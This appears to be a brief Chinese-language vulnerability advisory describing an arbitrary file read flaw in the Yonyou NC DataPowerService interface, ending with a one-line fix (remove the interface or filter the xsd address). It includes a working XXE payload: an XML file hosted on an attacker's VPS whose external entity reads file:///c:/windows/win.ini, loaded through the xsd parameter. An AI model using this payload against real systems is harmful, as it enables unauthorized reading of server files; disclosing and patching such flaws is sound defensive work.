用友NC DataPowerService接口存在任意文件读取,备注需要：需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件为：<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>，然后在路径中xsd=VPS上建立的文件，则能达到任意文件读取

删除该接口,或者过滤xsd地址